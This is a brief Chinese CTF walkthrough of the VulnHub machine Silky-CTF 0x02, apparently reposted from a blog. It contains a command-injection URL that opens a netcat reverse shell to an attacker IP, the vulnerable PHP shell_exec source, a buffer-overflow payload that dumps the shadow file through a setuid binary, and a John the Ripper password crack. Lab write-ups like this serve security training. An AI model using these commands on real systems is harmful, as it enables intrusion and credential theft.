靶機地址:
https://www.vulnhub.com/entry/silky-ctf-0x02,307/
主機掃描:
HTTP進行目錄爆破
嘗試SQL注入會被封掉IP
經過嘗試發現username欄位存在命令執行的漏洞
我們執行進行shell反彈
http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
amdin.php
<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>
接下來進行提權操作:
find / -perm -g=s -type f 2>/dev/null
看起來應該是利用緩沖區溢位,匯入shadow檔案,這里我們要構造十六進制的payload
./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')
破解密碼
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
OVER!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/10887.html
標籤:訊息安全
上一篇:淺析橢圓曲線加密演算法(ECC)